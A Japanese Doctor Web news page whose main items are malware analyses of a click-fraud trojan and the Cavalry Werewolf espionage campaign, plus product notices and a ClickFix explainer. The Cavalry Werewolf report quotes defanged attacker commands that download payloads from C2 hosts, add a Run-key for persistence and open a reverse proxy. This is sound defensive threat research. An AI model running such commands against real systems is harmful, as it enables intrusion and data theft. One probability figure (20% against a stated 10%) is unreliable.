まず初めに、Trojan.ChimeraWireは対象とする検索エンジンを使用して、設定内で指定されているドメインとキーフレーズでWebサイトを検索します。次に、検索結果に表示されたサイトを開き、ハイパーリンクを定義するHTML要素をすべて見つけ出します。トロイの木馬はこれらの要素をデータ配列にしてシャッフルし、そこに含まれるすべてのオブジェクトがWebページに表示された結果と異なる順番になるように並べ替えます。これは、クリック順序を追跡するWebサイトのボット対策機能を回避する目的で行われます。

続けて、Trojan.ChimeraWireは見つけたリンクとそこに含まれる文字列が設定内のテンプレートと一致するかどうかをチェックし、一致した数を計算します。トロイの木馬のその後の動作はこの一致数に応じて異なります。

ページ上で十分な数の一致するリンクが見つかった場合、Trojan.ChimeraWireはそのページをスキャンし、検出されたリンクを関連度の高い順に並べ替えます（キーフレーズに最も一致するものが最初にくるように）。その後、1つないしは複数の一致するリンクがクリックされます。

指定されたテンプレートとの十分な数の一致がない場合や、まったく一致がない場合、Trojan.ChimeraWireは実際の人間の行動を可能な限りそっくりに模倣する確率的行動モデルのアルゴリズムを使用し、設定内に含まれているパラメータと重み付け分布に基づいて開くリンクの数を決定します。たとえば、分布が["1:90", "2:10"]の場合、トロイの木馬は90%の確率で1つのリンクをクリックし、20%の確率で2つのリンクをクリックします。つまり、リンクが1つクリックされる可能性が極めて高いということになります。Trojan.ChimeraWireは先の工程で作成したデータ配列の中からリンクをランダムに選択してクリックを実行します。

トロイの木馬が検索結果からリンクを開いてそのWebページ上でクリックを実行するたびに、指定されたタスクに応じて前のブラウザタブに戻るかまたは次のタブに進みます。そしてこの動作が、対象となるサイトでのクリック数の上限に達するまで繰り返されます。

以下は、トロイの木馬がC2サーバーから受信したタスクで操作するように指示されていたWebサイトの例です。

トロイの木馬ChimeraWireならびにそのダウンロードに関与するマルウェアに関する詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。

Trojan.ChimeraWireの詳細 ※英語 Trojan.DownLoader48.54600の詳細 ※英語 Trojan.Starter.8377の詳細 ※英語 Python.Downloader.208の詳細 ※英語 Trojan.DownLoader48.54318の詳細 ※英語 Trojan.DownLoader48.61444の詳細 ※英語

結論

現在のところ、Trojan.ChimeraWireの実行する悪意のあるアクティビティは、要するにWebサイトの人気度を高めることを目的としたクリック操作だけという比較的単純なものにとどまっています。しかしながら、このトロイの木馬がベースとするツールには、実際のユーザーによる操作を装った自動アクションなどといったより広範なタスクの実行を可能とする機能が備わっています。たとえば、悪意のある脅威アクターはTrojan.ChimeraWireを使用して、広告目的のアンケートを実施するものなどあらゆるサイトのWebフォームに自動入力することができます。さらに、サイバースパイ活動やさまざまなデータベース（メールアドレス、電話番号などの）を構築するためのデータ自動収集を目的に、Webページの内容を読み取ったりそれらのスクリーンショットを撮ったりすることも可能です。

したがって、将来的にはこうした機能が完全に実装されたTrojan.ChimeraWireの新たなバージョンが登場するものと考えられます。Doctor Webではこのトロイの木馬の進化を引き続き監視していきます。

MITRE ATT&CK®

Stage（段階）	Technique（技術・手法）
Execution（実行）	T1204：User execution（ユーザーによる実行） T1204.002：Malicious File（悪意のあるファイル） T1204.005：Malicious Library（悪意のあるライブラリ） T1059.001：PowerShell T1059.003：Windows Command Shell T1059.005：Visual Basic T1059.006：Python T1053.005：Scheduled Task（スケジュールされたタスク）
Persistence（永続化）	T1547.001：Registry Run Keys / Startup Folder （レジストリRunキー/スタートアップフォルダ） T1053：Scheduled Task/Job（スケジュールされたタスク/ジョブ）
Privilege Escalation（権限昇格）	T1574.001：Hijack Execution Flow: DLL （実行フローのハイジャック：DLL） T1548.002：Bypass User Account Control （ユーザーアカウント制御のバイパス）
Defense Evasion（防御回避）	T1027.013：Encrypted/Encoded File（暗号化/エンコードされたファイル） T1622：Debugger Evasion（デバッガ回避 T1564.003：Hidden Window （非表示ウィンドウ） T1564.012：File/Path Exclusions（ファイル/パスの除外） T1140：Deobfuscate/Decode Files or Information（ファイルまたは情報の難読化解除/デコード） T1574.001：Hijack Execution Flow: DLL （実行フローのハイジャック：DLL）
Command and Control（コマンド・アンド・コントロール）	T1102.002：Bidirectional Communication（双方向通信） T1071.001：Web Protocols（Webプロトコル）

Indicators of compromise（セキュリティ侵害インジケーター）

日本での15周年を記念して Dr.Web の総合セキュリティを 50%オフで提供する特別キャンペーンを実施！

Mon, 01 Dec 2025 06:32:31 GMT

Doctor Web Pacific, Inc. は、日本のユーザーをサイバー脅威から守り続けて15周年を迎えました。
これまでのご愛顧に感謝を込めて、対象製品を 50%割引で購入できる記念キャンペーンを実施いたします。

■キャンペーン概要
●対象製品
・Dr.Web Security Space
・Dr.Web Security Space for Mobile Devices

●割引内容
上記製品を通常価格の50%オフ

●選べるライセンス構成
・利用期間：1年または 3年
・デバイス数：1台 / 3台 / 5台

●実施期間
2025年12月1日～ 2026年1月31日

■Dr.Web が提供する安心のセキュリティ
Dr.Web ソリューションは、最新のサイバー脅威からパソコンやスマートフォンを強力に保護します。
・不正ログインの防止
・個人情報狙いの不正プログラム対策
・フィッシング誘導の遮断
・危険リンク・有害サイトのブロック
・ランサムウェア等のマルウェア防御
Dr.Web は、堅牢な防御機能により、利用環境の安全性を維持します。

■今だけの特別価格で Dr.Web をお試しください
15周年を記念した期間限定の大幅割引です。ぜひこの機会に、Dr.Web の強力なセキュリティをお得にご利用ください。
50%割引で購入する

Dr.Web CureIt!、マルウェアの隠蔽動作を解析して検出可能に

Thu, 20 Nov 2025 08:00:25 GMT

Doctor Web は、無料ユーティリティ Dr.Web CureIt! のアップデートをリリースしました。今回のアップデートでは、マルウェアがアンチウイルスの除外リストに隠そうとするファイルやフォルダを検査できる新機能が追加されました。これにより、セキュリティシステムを意図的に無効化しようとする高度な脅威に対する重要な対策となります。

この新機能は、弊社の別製品 Dr.Web FixIt! の成功を背景に実現したものです。Dr.Web FixIt! は、Doctor Web のスペシャリストがインシデント調査や複雑な感染修復を行う際に使用するツールで、多くのマルウェアは侵入後、自身の実行ファイルをアンチウイルスの除外リストに追加しようとします。これによりアンチウイルスは悪意のあるオブジェクトを無視し、攻撃者がデータ窃取・ファイル暗号化・ボットネットによるリソース悪用などを自由に行える危険な状態が生まれます。
■ 新機能の概要

除外リストの自動解析
Dr.Web CureIt! はスキャン開始時に、PC にインストールされている、または OS に組み込まれたアンチウイルスの除外リストを自動で読み取り・解析します。
除外対象を徹底スキャン
除外リストに登録されているすべてのファイルおよびフォルダを、Dr.Web のアンチウイルスエンジンによって徹底的に検査します。
脅威を通知・駆除
除外リスト内で悪意のあるオブジェクトが検出された場合、ユーザーに通知し、脅威を駆除します。

一般ユーザーは、セキュリティシステムが攻撃者に不正操作されていることに気づかないケースが多く存在します。今回の新機能により、マルウェアが痕跡を隠そうとしても、Dr.Web CureIt! がその活動を検知し、確実に排除することが可能となりました。

■ 今後の予定：Linux 向けプロフェッショナル緊急対応サービス

Doctor Web では、Windows 向け Dr.Web FixIt! の成功を受け、Linux 向けサービスのフルバージョンリリースに向けた準備を進めています。この新サービスは、企業インフラを狙うサイバー攻撃の調査を行う情報セキュリティ専門家のサポートを目的としています。
現時点では、Linux 対応 Dr.Web FixIt! ユーティリティは、システム情報をテクニカルサポートへ送信する用途で利用できます。以下のページからアクセス可能です：
https://free.drweb.co.jp/sysinfo/
さらに、今回の開発成果を生かした一般ユーザー向け Dr.Web CureIt! の Linux 版も将来的に登場する予定です。これにより、Linux マシンの迅速なスキャンおよび感染修復が可能になります。

■ Dr.Web CureIt! の新バージョン入手方法
Dr.Web CureIt! の最新バージョンは、以下の公式サイトより無料でダウンロードいただけます（個人ユーザーのみ無料）。
https://free.drweb.co.jp/download+cureit+free/

ハッカー集団「Cavalry Werewolf」がロシア政府機関を攻撃

Tue, 11 Nov 2025 03:00:00 GMT

2025年11月11日

序論

2025年７月、Doctor Webはクライアントであるロシア政府機関の1つから、内部ネットワークが侵害されている疑いがあるという連絡を受けました。疑いを抱くきっかけとなったのは、同機関のメールアドレスの１つからスパムメールが送信されていることが検出されたことでした。Doctor Webのアンチウイルスラボによるインシデント調査の結果、当該機関はハッカー集団による標的型攻撃を受けていたことが明らかになり、その集団は「Cavalry Werewolf」であることが特定されました。この攻撃は機密情報とネットワーク設定データを収集することを目的の１つとしたものでした。

この調査において、Doctor Webのエキスパートはオープンソースツールを含むこれまでに知られていなかったマルウェアを特定することに成功しました。それらの一部として、攻撃対象システム上でのリモートコマンド実行を可能にし、偵察とそれに続くネットワークインフラストラクチャ内での足場固めのための環境を整える複数のバックドアが確認されています。

本稿では、発見されたCavalry Werewolfのツールや同ハッカー集団の特徴、そしてこれらのサイバー犯罪者たちが侵害されたネットワーク内で実行する典型的なアクションについて解説します。

攻撃および使用されたツールに関する全般的情報

1台目のコンピューターに対する初期アクセス（最初のアクセス）には一般的な攻撃ベクトルが用いられています。すなわち、文書に偽装したマルウェアの添付されたフィッシングメールです。今回の事例では、攻撃時点で未知のバックドアであったBackDoor.ShellNET.1がメッセージに含まれていました。これはオープンソースソフトウェアReverse-Shell-CSをベースにしたバックドアで、感染したシステムにリバースシェル経由でリモート接続してさまざまなコマンドを実行することを可能にします。このバックドアはパスワード保護されたアーカイブ内に仕込まれており、フィッシングキャンペーンごとに異なる名前が付いています。

BackDoor.ShellNET.1に付けられたファイル名のバリエーション
Службеная записка от 16.06.2025___________________________.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О проведении личного приема граждан список участников.exe
О работе почтового сервера план и проведенная работа.exe

BackDoor.ShellNET.1の添付されたフィッシングメールの例：攻撃者は「文書」を読むよう受信者に促し、アーカイブを解凍するためのパスワードを提供している

攻撃者は BackDoor.ShellNET.1 を使用して標的システム内での足がかりの構築を進めました。ファイル転送タスクを管理するためのWindows標準ツールBitsadmin（C:\Windows\SysWOW64\bitsadmin.exe）を介して複数の悪意のあるプログラムがダウンロードされています。このプログラムは特定のコマンドラインスイッチを使用して現在のシステム管理者として起動されていました。以下はその例です

cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe

BackDoor.ShellNET.1 によって最初にダウンロードされた脅威はスティーラーTrojan.FileSpyNET.5でした。このトロイの木馬を使用して、攻撃者はコンピューター上に保存されている .doc、.docx、.xlsx、.pdf 形式の文書、テキストファイル（.txt）、画像ファイル（.jpg、.png）をダウンロードしています。

次に、バックドアBackDoor.Tunnel.41（オープンソースソフトウェアReverseSocks5）がインストールされました。攻撃者はこのバックドアを使用することでSOCKS5トンネルを作成して密かにコンピューターに接続し、そこでコマンドを実行（別のマルウェアをインストールするなど）しています。

Cavalry Werewolfのツール

今回のインシデントに関する調査の結果、Cavalry Werewolfによる標的型攻撃では上記のマルウェアのみでなく他のツールも多数使用されていることが明らかになりました。Cavalry Werewolfのマルウェア作成者は武器として用いるマルウェアの組み合わせを1つにとどめることなく、その数を常に増やし続けているという点に注意する必要があります。そのため、標的システムへの侵入に使用されるツールや感染チェーンにおけるその先の段階は、攻撃対象となる組織によって異なる場合があります。

エントリーポイント（侵入口）

感染チェーンの第一段階となるのはCavalry Werewolfから送信されるフィッシングメールに仕込まれたマルウェアです。ただし、それらマルウェアの種類は1つだけではありません。Doctor Webのウイルスアナリストによって以下が特定されています。

スクリプト（BAT.DownLoader.1138）
実行ファイル（Trojan.Packed2.49708、 Trojan.Siggen31.54011、 BackDoor.Siggen2.5463、 BackDoor.RShell.169、 BackDoor.ReverseShell.10）

BAT.DownLoader.1138

PowerShellバックドアPowerShell.BackDoor.109を標的システムにダウンロードするバッチファイルです。このバックドアはコンピューター上に別のマルウェアをダウンロードして起動する目的で攻撃者によって使用されます。

BAT.DownLoader.1138の既知のファイル名	SHA1ハッシュ	С2サーバー
scan26_08_2025.bat	d2106c8dfd0c681c27483a21cc72d746b2e5c18c	168[.]100.10[.]73

Trojan.Packed2.49708

本体内に暗号化された形で格納されているバックドアBackDoor.Spy.4033をインストールするトロイの木馬です。このバックドアは、攻撃者が感染したシステム上でリバースシェル経由でコマンドを実行することを可能にします。

Trojan.Packed2.49708の既知のファイル名	SHA1ハッシュ	С2サーバー
О проведении личного приема граждан список участников план и проведенная работа.exe C:\Windows\2o1nzu.exe	5684972ded765b0b08b290c85c8fac8ed3fea273	185[.]173.37[.]67
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe	29ee3910d05e248cfb3ff62bd2e85e9c76db44a5	185[.]231.155[.]111
О работе почтового сервера план и проведенная работа.exe Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe План-протокол встречи о сотрудничестве представителей должн.лиц.exe	ce4912e5cd46fae58916c9ed49459c9232955302	109[.]172.85[.]95
C:\Windows\746wljxfs.exe	653ffc8c3ec85c6210a416b92d828a28b2353c17	185[.]173.37[.]67
—	b52e1c9484ab694720dc62d501deca2aa922a078	109[.]172.85[.]95

Trojan.Siggen31.54011

本体内に暗号化された形で格納されているバックドアBackDoor.Spy.4038をインストールするトロイの木馬です。このバックドアは、攻撃者が感染したシステム上でリバースシェル経由でコマンドを実行することを可能にします。

Trojan.Siggen31.54011の機能はTrojan.Packed2.49708と似ていますが、ペイロードの抽出アルゴリズムがわずかに異っています。

SHA1ハッシュ	С2サーバー
baab225a50502a156222fcc234a87c09bc2b1647	109[.]172.85[.]63
93000d43d5c54b07b52efbdad3012e232bdb49cc	109[.]172.85[.]63

BackDoor.Siggen2.5463

Telegramボットを介して操作され、攻撃者から受け取ったタスクを実行するバックドアです。このマルウェアのメイン機能は本体内に隠されたPowerShellコードにあります。

BackDoor.Siggen2.5463の既知のファイル名	SHA1ハッシュ	ペイロード
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe system.exe	c96beb026dc871256e86eca01e1f5ba2247a0df6	PowerShell.BackDoor.108

BackDoor.RShell.169

攻撃者がリバースシェル経由で感染したコンピューターにリモート接続し、さまざまなコマンドを実行できるようにするバックドアです。

BackDoor.RShell.169の既知のファイル名	SHA1ハッシュ	С2サーバー
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe	633885f16ef1e848a2e057169ab45d363f3f8c57	109[.]172.85[.]63

BackDoor.ReverseShell.10

リバースシェルを有効にし、攻撃者にシステムへのリモートアクセスを提供するバックドアです。

BackDoor.ReverseShell.10の既知のファイル名	SHA1ハッシュ	С2サーバー
к проектам.exe Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe	dd98dcf6807a7281e102307d61c71b7954b93032	195[.]2.78[.]133
Служебная записка от 20.08.2025 .exe Служебная записка от 12.08.2025 .exe	f546861adc7c8ca88e3b302d274e6fffb63de9b0	62[.]113.114[.]209

次の感染段階

デバイスが侵害された後、その感染したデバイス上には以下のマルウェアがインストールされる可能性があります。

Trojan.Inject5.57968

本体内に暗号化されたバックドアを持つトロイの木馬です。そのバックドアは、攻撃者が感染したコンピューターに悪意のあるプログラムをダウンロードすることを可能にします。ペイロードの復号化は複数の段階で実行され、そのうちの1つで、Microsoft .NET Frameworkパッケージの一部であるaspnet_compiler.exeプログラムのプロセスに悪意のあるデータ配列が挿入されます。その後、完全に復号化されたバックドアがこの正規アプリのプロセスコンテキスト内で動作します。

インタラクティブな脅威アナライザーDr.Web vxCube の「サンドボックス」を使用した、Trojan.Inject5.57968のアクティビティ調査

Trojan.Inject5.57968の既知のファイル名	SHA1ハッシュ	С2サーバー	ペイロード
pickmum1.exe	e840c521ec436915da71eb9b0cfd56990f4e53e5	64[.]95.11[.]202	Trojan.PackedNET.3351
mummyfile1.exe	22641dea0dbe58e71f93615c208610f79d661228	64[.]95.11[.]202	Trojan.PackedNET.3351

BackDoor.ShellNET.2

Telegramボットを介して操作され、攻撃者から受け取ったコマンドを実行するバックドアです。

BackDoor.ShellNET.2の既知のファイル名	SHA1ハッシュ
win.exe	1957fb36537df5d1a29fb7383bc7cde00cd88c77

BackDoor.ReverseProxy.1

オープンソースソフトウェアReverseSocks5をベースにしたバックドアで、感染したシステム上でSOCKS5プロキシを有効にしてリモートアクセスを可能にします。BackDoor.ReverseProxy.1は -connect IPパラメータを指定してコマンドインタープリタcmd.exeから起動されることにより、目的のアドレスに接続します。アドレスがハードコードされている亜種も存在します。

以下のIPアドレスが検出されています。

78[.]128.112[.]209 (起動コマンドで指定)
96[.]9.125[.]168 (起動コマンドで指定)
188[.]127.231[.]136 (ハードコード)

BackDoor.ReverseProxy.1の既知のファイル名	SHA1ハッシュ
revv2.exe	6ec8a10a71518563e012f4d24499b12586128c55

Trojan.Packed2.49862

攻撃者によって悪意のあるコードが埋め込まれた、正規プログラムのトロイの木馬化されたバージョンの検出名です。アーカイバWinRarおよび7-Zip、開発ツールVisual Studio Code、テキストエディタAkelPadをはじめとする複数のアプリの悪意のある改変版が発見されています。メッセンジャーMAXに偽装したSumatra PDF Readerもそのうちの1つです。改変版は本来の機能を実行することはできず、起動されると埋め込まれたトロイの木馬コンポーネントを初期化するだけです。

これらの改変版には、サイバー犯罪者の目的に応じてあらゆる種類のマルウェアが仕込まれています。以下はその一部です。

BackDoor.ReverseProxy.1 (ReverseSocks5)
BackDoor.Shell.275 (AdaptixC2)
BackDoor.AdaptixC2.11 (AdaptixC2)
BackDoor.Havoc.16 (Havoc)
BackDoor.Meterpreter.227 (CobaltStrike)
Trojan.Siggen9.56514 (AsyncRAT)
Trojan.Clipper.808

Trojan.Packed2.49862の既知のファイル名	SHA1ハッシュ	С2サーバー	ペイロード
code.exe rev2.exe	8279ad4a8ad20bf7bbca0fc54428d6cdc136b776	188[.]127.231[.]136	BackDoor.ReverseProxy.1
code.exe revv.exe	a2326011368d994e99509388cb3dc132d7c2053f	192[.]168.11[.]10	BackDoor.ReverseProxy.1
7zr.exe winload.exe system.exe Recorded_TV.exe	451cfa10538bc572d9fd3d09758eb945ac1b9437	77[.]232.42[.]107	BackDoor.Shell.275
Command line RAR winlock.exe Recorded_TV.exe	a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2	77[.]232.42[.]107	BackDoor.AdaptixC2.11
winsrv.exe firefox.exe	bbe3a5ef79e996d9411c8320b879c5e31369921e	94[.]198.52[.]210	BackDoor.AdaptixC2.11
AkelPad.exe	e8ab26b3141fbb410522b2cbabdc7e00a9a55251	78[.]128.112[.]209	BackDoor.Havoc.16
7z.exe	dcd374105a5542ef5100f6034c805878153b1205	192[.]168.88[.]104	BackDoor.Meterpreter.227
7z.exe	e51a65f50b8bb3abf1b7f2f9217a24acfb3de618	192[.]168.1[.]157	Trojan.Siggen9.56514
7z.exe chromedriver.exe	d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4	Telegram-бот	Trojan.Clipper.808
7z 7z.exe svc_host.exe dzveo09ww.exe	c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81	Telegram-бот	Trojan.Clipper.808
—	b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5	Telegram-бот	Trojan.Clipper.808
max - для бизнеса.exe	b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231	89[.]22.161[.]133	BackDoor.Havoc.16

侵害されたネットワーク内でCavalry Werewolfが実行する典型的なアクション

標的となる組織のコンピューターインフラストラクチャに侵入した攻撃者は、データ収集やシステム内でのさらなる足場固めを目的としたさまざまなアクションを実行します。

感染させたコンピューターに関する情報を収集するために、以下のコマンドを実行します。

whoami — カレントユーザーに関する情報を取得する
dir C:\\users\\<user>\\Downloads — カレントユーザーの「ダウンロード」フォルダ内にあるファイルのリストを取得する
dir C:\\users\\public\\pictures\\ — 共有フォルダの「ピクチャ」フォルダ内にあるファイルのリストを取得する（どのマルウェアがすでにシステム内にダウンロードされているかを特定するため）
ipconfig /all — ネットワーク設定を取得する
net user — システム内のすべてのユーザーのリストを取得する

プロキシサーバーに関する情報を収集し、ネットワークの機能をチェックするために、以下のコマンドを使用します。

powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
curl -I https://google.com
curl -I https://google.com -x <proxy>

以下のツールを使用してネットワークを設定します。

Windows OSに含まれているコマンドラインツールnetsh

続けて、以下の正規ツールを使用して悪意のあるツールをシステムに送り込みます。

PowerShell （例: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe）
Bitsadmin （例: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe）
curl （例: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe）

システム内での足場を固めるために以下を実行します。

Windowsレジストリを変更する（例：REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\users\public\pictures\win.exe /f）

コマンドラインインタープリタcmd.exe を使用して悪意のあるツールを起動します。
例：

C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443 — BackDoor.ReverseProxy.1;
C:\\users\\public\\pictures\\732.exe — BackDoor.Tunnel.41.

攻撃者はPowerShellを使用して悪意のあるツールを削除できます。
例：

powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe

また、pingコマンドを使用してC2サーバーが利用可能であるかどうか定期的にチェックすることもできます。

ハッカー集団Cavalry Werewolfの特徴

ハッカー集団Cavalry Werewolfの大きな特徴として以下が挙げられます。

オープンソースソフトウェアを好んで使用する（オリジナルをそのまま使用する場合と、それをベースに独自のツールを開発する場合がある）。
メインとなるツールは、感染したシステム上でのリモートコマンド実行を可能にするさまざまなリバースシェルバックドアである。
元々は無害なプログラムに悪意のあるコードを埋め込むことができる。
感染したコンピューターを制御するためにTelegram APIを使用することが多い。
侵害したメールアドレスを使用して政府機関を装ったメールを送信するというフィッシングキャンペーンによって、感染の第一段階を担うマルウェアを送り込む。
その後の感染段階を担うマルウェアを標的デバイスにダウンロードするために、C:\\users\\public\\pictures、C:\\users\\public\\libraries、C:\\users\\public\\downloadsディレクトリを使用する。

このたび特定されたCavalry Werewolfのツールに関する詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。

MITREマトリックス

Stage（段階）	Technique（技術・手法）
Initial access（初期アクセス）	T1566.001：Spearphishing attachment（スピアフィッシング添付ファイル）
Execution（実行）	T1204：User execution（ユーザーによる実行） T1059.001：PowerShell T1059.003：Windows Command Shell
Persistence（永続化）	T1547.001：Registry Run Keys / Startup Folder （レジストリRunキー／スタートアップフォルダ） T1197：BITS Jobs （BITSジョブ）
Privilege Escalation（権限昇格）	T1548.002：Bypass User Account Control（ユーザーアカウント制御のバイパス）
Defense Evasion（防御回避）	T1197：BITS Jobs（BITSジョブ）
Command and Control（コマンド・アンド・コントロール）	T1090.002：External Proxy（外部プロキシ） T1102.002：Bidirectional Communication（双方向通信）
Exfiltration（情報窃取）	T1041：Exfiltration Over C2 Channel（C2チャネルを介した盗み出し） T1567：Exfiltration Over Web Service（Webサービスを介した盗み出し）

Indicators of compromise(侵害の痕跡)※英語

モバイルデバイス向けのDr.Webアップデート、インテリジェント保護システムを新たに実装

Fri, 07 Nov 2025 09:00:00 GMT

スマートフォン、タブレット、他のAndroid対応デバイス向けのアンチウイルス製品がリリースされました。主な改良点は、保護の自動化と安定性の向上です。

アップデートの特徴

新機能「自動脅威処理」の実装により、Dr.Webソリューションは、遅延なく、ユーザーの操作なしで悪意あるオブジェクトの駆除や不審なリンクのブロック、危険なアプリの隔離を自動で行えるようになりました。

利用のメリット

個人ユーザーは、もはや脅威通知を逐一確認する必要がありません。
新機能により、アンチウイルス製品が検出から対応までを自動で行うため、ユーザー操作を介さずに独立して動作します。Doctor Webの専門家が開発したインテリジェントシステムは、マルウェアの種類に応じて設定されたパラメータに基づき、脅威をリアルタイムで自動駆除します。
特に法人ユーザーにとっては、悪意あるオブジェクトの駆除や不審なリンクのブロックなどの対応を、システム管理者の介入なしで即時に実行できる点が大きな利点です。
これらの機能はControl Center経由でも管理可能です。

運用の利便性向上

今回のアップデートでは、Androidデバイス上で検出された脅威に対し、ScannerおよびSpIDer Guardコンポーネントの対応を一元管理できる機能が追加されました。
システム管理者は、脅威の種類に応じて、Dr.Webエージェントの動作（通知・駆除・無視など）を柔軟に設定できます。

【重要なお知らせ! 】

最新バージョンのリリースに伴い、Android OS バージョン4.4のサポートを終了いたします。アップデートの際はご注意ください。
Doctor Web公式ウェブサイトからダウンロードされた Dr.Web Security Space for mobile devices をご利用の場合、アップデートのためにアプリケーションの完全な再インストールが必要です。最新バージョンのエージェントをダウンロードし、再インストールを行ってください。
一方、Google Playからダウンロードされた Dr.Web Security Space for mobile devices、Dr.Webサブスクリプションサービス、または Dr.Web Mobile Security Suite をご利用の場合、今回のアップデートは通常どおり実行されます。

Dr.Web Enterprise Security Suite / Dr.Web Industrialの集中管理サーバーのアップデート

Fri, 07 Nov 2025 09:00:00 GMT

― 安定性の向上とAndroid端末管理機能の強化 ―
Dr.Web Enterprise Security SuiteおよびDr.Web Industrialサーバーの最新アップデートがリリースされました。今回のバージョンでは、安定性の向上に加え、Android対応デバイスの脅威対処を強化する新しい集中管理ツールが追加されています。システムを安定してご利用いただくため、サーバーを最新バージョンへ更新することを推奨します。

機能強化の概要
最新のDr.Web Enterprise Security Suiteサーバーでは、保護システムの管理機能がさらに強化されました。Android端末の保護機能も改善され、Control Centerからアンチウイルス保護をより包括的に管理できるようになっています。

新しい集中管理機能
アップデートにより、Androidデバイス上で検出された脅威への対応を、ScannerおよびSpIDer Guardコンポーネントを通じて一元管理できるようになりました。
システム管理者は、脅威の種類に応じてDr.Webエージェントの動作（通知・駆除・無視など）を柔軟に設定できます。

設定方法の変更
これまで「アドウェアをチェック」および「潜在的に危険なプログラムをチェック」として表示されていた設定項目が、新しい選択方式に置き換えられました。
• チェックが無効な場合：該当プログラムへのデフォルトアクションは「無視」となります。
• チェックが有効な場合：「レポート」アクションが適用されます。

【重要事項】

新バージョンの全機能を有効にし、保護コンポーネントを正常に動作させるためには、集中管理サーバーを最新バージョンへ更新する必要があります。アップデートは管理コンソールのWebインターフェイスから実行できます。
アップデート設定や実施に関するご不明点がありましたら、テクニカルサポートまでお問い合わせください。

急増する「ClickFix攻撃」とは

Wed, 29 Oct 2025 00:00:00 GMT

2025年10月29日

ClickFix攻撃によるセキュリティインシデントが急激に増加し、世界中で多くのユーザーを不安に陥れています。攻撃者はソーシャルエンジニアリング手法を用いてユーザーを操り、デバイス上で悪意のあるコードを実行させます。

攻撃は、ユーザーが侵害されたサイトや偽サイトにアクセスし、ブラウザのエラーによりWebページを正しく表示できない、あるいは更新が必要であるなどと通知する警告メッセージを目にするところから始まります。

通常、こうしたメッセージには「修正」、「チェック」、「更新」などのボタンが含まれており、ボタンが画面に表示されるやいなや悪意のあるコードが自動的にクリップボードにコピーされます。ユーザーがボタンをクリックする必要すらありません。続けて、ユーザーはこのコードをコマンドプロンプトまたは「実行」ダイアログボックスに貼り付けるよう指示されます。ユーザーが指示に従うと直ちに悪意のあるプログラムがインストールされて起動されます。この操作はユーザー自らが実行するため、多くの場合アンチウイルスによって防ぐことができません。

以下にClickFix攻撃の流れを簡潔に再現します。

ユーザーがコンテンツを読み込んで表示すると、ブラウザに突然警告メッセージが表示されます。メッセージには、最近のブラウザ更新による問題が原因でコンテンツを正しく表示することができないと記載されています。

そして、問題を解決するために次の操作を実行するようユーザーに指示しています。

「Fix it!（修正）」ボタンをクリックする
Windowsのスタートボタンを右クリックする
プログラム一覧でWindows PowerShellを見つけ、管理者権限で開く
右クリックでクリップボードの内容をターミナルウィンドウに貼り付け、コマンドを実行する

ユーザーがボタンをクリックすると、悪意のあるスクリプトがクリップボードにコピーされてターミナルウィンドウで実行されます。

このスクリプトは、攻撃者が侵害したシステムを遠隔操作するために使用するC2インフラストラクチャへのリモート接続を確立します。

この事例では、リモートC2ホストとの接続が確立され、ペイロードがユーザーのデバイス上にダウンロードされます。その後、hostsファイルを改変するよう設計された悪意のある実行ファイルが起動され、実行中のスクリプトが終了します。

Dr.Webには予防的保護テクノロジーが搭載されており、スクリプトが実行ファイルの起動を試みると同時に脅威を検出することが可能です。

ClickFix攻撃で多く使用されるまた別の手口が偽のCAPTCHAです。一見本物のように見えるCAPTCHA認証画面が表示され、その裏で密かに悪意のあるコードがクリップボードにコピーされます。自分は人間であるということを証明しているだけだと信じ込んでいるユーザーが気づかぬうちに悪意のあるコンテンツを操作してしまうため、攻撃の成功率が高まります。

CAPTCHA画面の次に、追加の検証手順を行うよう指示する画面が表示されます。

この手順を完了することでユーザーは知らないうちに悪意のあるスクリプトを実行し、攻撃者にデバイスへのリモートアクセスを提供してしまうことになります。

ClickFix攻撃の検出が難しい理由

ユーザーが偽サイトのボタンをクリックした時点では、アンチウイルスによって悪意のあるパターンは検出されません。この段階では操作はすべて正当なものに見えるからです。ユーザーが自らコマンドをコピー＆ペーストして実行する――システムに対する通常の操作を行っているように見えます。

検出はその後に起こります。すなわち、悪意のあるファイルが起動された、またはスクリプトがシステム内の他のプロセスに悪意のあるコードを挿入しようとした時点です。アンチウイルスはこの時点で脅威を検知し駆除します。言い換えると、マルウェアが他のプロセスに干渉したり怪しい挙動を示したりしてすでにタスクを実行している、いわゆるポストエクスプロイト（post-exploit：エクスプロイト成功後）の段階になって初めて保護テクノロジーがアクションを起こすのです。

通常、この段階で攻撃者はすでに被害者のシステムに接続し、ペイロードを送り込んでいます。そしてペイロードは正規のプロセスに偽装することが可能です。
この段階で攻撃者は以下を実行することができます。

権限を昇格する
データを収集する
ネットワーク内をナビゲートする
アンチウイルスソフトウェアを無効化しようとする

